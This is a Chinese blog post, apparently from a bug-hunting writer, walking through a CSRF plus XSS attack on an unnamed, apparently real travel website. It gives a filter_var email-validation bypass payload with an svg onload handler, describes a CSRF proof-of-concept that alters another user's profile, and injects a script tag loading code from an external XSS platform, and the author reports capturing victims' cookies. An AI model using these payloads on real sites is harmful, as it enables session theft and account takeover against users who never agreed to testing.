vlambda博客
学习文章列表

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

0x00 前言

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

0x01开胃小菜

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳这里用的是PHP filter_var()函数,通过指定的过滤器过滤变量。可以测试得出,我们只需要 [email protected] 即可绕过:Payload: **"><svg/onload=confirm(1)>"@qq.com**

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

成功弹窗反射型xss

0x02 进一步验证CSRF存在性

往常一样,打开bp设置代理。我们注册了一个账号:账号:[email protected]密码:123456这个旅游网并没有对用户注册填写的信息进行验证,所以我们任意注册:

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

看到师傅写的文章,可以看得出:XSS是存在的,所以我们就不必去复现了,只需要闭合即可。

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

我去尝试过了,在最左边的个人资料修改处,抓取参数时有参数id产生,我也尝试去删除利用,发现无法会使得程序无法应用。所以我们就只能从右边下手。

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

这个是我盯紧的目标 我们去插入xss发现可以弹窗,我们再去注册一个账号,使得我们的CSRF可以利用。账号:nanfang1密码:123456对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳注册好后我们开始利用,登回去原先的nanfang

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

我们去制作csrfpoc

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

我们去登录nanfang1这个账号,然后试试可否成功:

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

会发现这里成功跳转且修改完成。

0x03两道菜组合炒

首先创建一个xsspt项目:

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

修改闭合如下:"><script src=https://xsspt.com/xxxxxx></script>//然后插入nanfang1当中制作一个csrfpoc,来看看能否成功:

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳我们登录nanfang这个账户试试能否成功。

对某大佬挖掘过的旅游网进一步打CSRF+XSS组合拳

看样子是成功插入的,我们去xss平台上看看有没有cookie

成功打到cookie,三分运气七分实力。